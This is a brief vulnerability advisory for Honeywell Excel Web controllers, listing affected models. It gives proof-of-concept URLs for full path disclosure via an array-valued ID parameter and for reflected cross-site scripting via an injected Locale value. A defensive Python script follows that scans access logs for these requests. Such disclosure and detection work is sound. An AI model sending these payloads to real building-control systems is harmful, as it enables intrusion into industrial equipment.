# Honeywell MCR Web Controller  
# Full Path Disclosure & Cross Site Scripting  
  
# Vendor Homepage: https://www.honeywell.com  
# WebVersion:  
XL1000C50 EXCEL WEB 52 I/O,  
XL1000C500 EXCEL WEB 300 I/O,  
XL1000C100 EXCEL WEB 104 I/O,  
XL1000C1000 EXCEL WEB 600 I/O,  
XL1000C50U EXCEL WEB 52 I/O UUKL,  
XL1000C500U EXCEL WEB 300 I/O UUKL,  
XL1000C100U EXCEL WEB 104 I/O UUKL,  
XL1000C1000U EXCEL WEB 600 I/O UUKL.  
  
# Tested on: EXCEL WEB - AIT AG XL1000C1000U 600 I/O UUKL - 05.03.2008  
  
# Date: Nov 09, 2019  
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>  
  
# Full Path Disclosure  
http://<excel-web.host>/standard/login/help.php  
http://<excel-web.host>/standard/login/help.php?Locale=1033&ID[]=0  
  
# Cross Site Scripting  
http://<excel-web.host>/standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22
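
For defenders, the two request patterns above can be looked for in web or reverse-proxy access logs. The following is an added example, not part of the original advisory or any Honeywell code; the combined-log-style sample lines are constructed, and it assumes that legitimate requests carry a purely numeric `Locale` and a scalar `ID`.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Nov/2019:10:00:01 +0000] "GET /standard/default.php?Locale=1033 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [09/Nov/2019:10:00:07 +0000] "GET /standard/login/help.php?Locale=1033&ID[]=0 HTTP/1.1" 200 812',
    '10.0.0.9 - - [09/Nov/2019:10:00:09 +0000] "GET /standard/default.php?Locale=%22%3C/script%3E%3Ch1%3EXSS%3C/%22 HTTP/1.1" 200 5300',
    '10.0.0.9 - - [09/Nov/2019:10:00:12 +0000] "GET /standard/login/help.php HTTP/1.1" 200 640',
    '10.0.0.5 - - [09/Nov/2019:10:01:30 +0000] "GET /standard/login/help.php?Locale=1033&ID=12 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [09/Nov/2019:10:02:02 +0000] "GET /standard/login/help.php?Locale=1033&ID%5B%5D=0 HTTP/1.1" 200 812',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qsl percent-decodes keys and values, so ID%5B%5D is seen as ID[]
    params = parse_qsl(parts.query, keep_blank_values=True)
    keys = [k for k, _ in params]
    findings = []
    if path.endswith("/standard/login/help.php"):
        if any(k.startswith("ID[") for k in keys):
            findings.append("help.php: ID passed as array")
        elif "ID" not in keys:
            findings.append("help.php: requested without ID")
    if path.startswith("/standard/"):
        for k, v in params:
            # Assumption: a legitimate Locale is a numeric ID such as 1033
            if k == "Locale" and not re.fullmatch(r"[0-9]+", v):
                findings.append("Locale is not a numeric ID")
    return findings

def scan(lines):
    """Return (line_number, finding) pairs for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, f) for f in classify(match.group(1)))
    return hits

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```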